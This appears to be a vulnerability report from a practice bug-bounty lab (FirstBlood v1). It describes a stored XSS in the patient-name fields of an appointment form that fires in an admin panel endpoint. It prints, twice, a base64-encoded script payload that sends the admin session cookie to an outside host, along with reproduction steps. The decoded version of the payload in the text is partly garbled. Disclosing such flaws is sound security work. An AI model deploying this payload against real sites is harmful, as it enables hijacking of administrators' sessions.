FirstBlood-#171Stored XSS payload allowed in names when making an appointment can leak admin cookie
This issue was discovered on FirstBlood v1

On 2021-05-11, xnl-h4ck3r Level 4 reported:


A stored XSS vulnerability exists that allows an attacker to insert a payload in First name (fname) and/or Surname (lname) on /book-appointment.html that will fire on the endpoint /drpanel/drapi/query.php if an admin views the endpoint directly for that appointment. The payload can leak the admin session cookie to the attacker.

Steps to Reproduce

  1. Book an appointment on /book-appointment.html and set the first name to <script/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="></script/x> Set all other fields to anything NOTE: This payload contains a Base64 encoding of var x=new XMLHttpRequest();'GET','//' + document.cookie);x.send(); which gets around various variousWAF filters. A burp collab URL can replace for replicating.
  2. Login in as an admin user and go to drpanel/index.php
  3. Look at the appointment ypu just made and use dev tools to inspect the element and make note of the apt id passed to the getinfo function, e.g. 56912315:

  1. Go to /drpanel/drapi/query.php?aptid=56912315 where the aptid parameter is set the ID found in Step 3.
  2. Observe the payload fires and the value of cookie drps is leaked to the attackers server, e.g.


The impact of this vulnerability is that an attacker could steal the admins drps cookie, potentially allowing them to perform actions as that user that requrie admin authorisation.

P2 High

Endpoint: /drpanel/drapi/query.php

Parameter: fname, lname

Payload: <script/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="></script/x>

FirstBlood ID: 10
Vulnerability Type: Stored XSS

When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name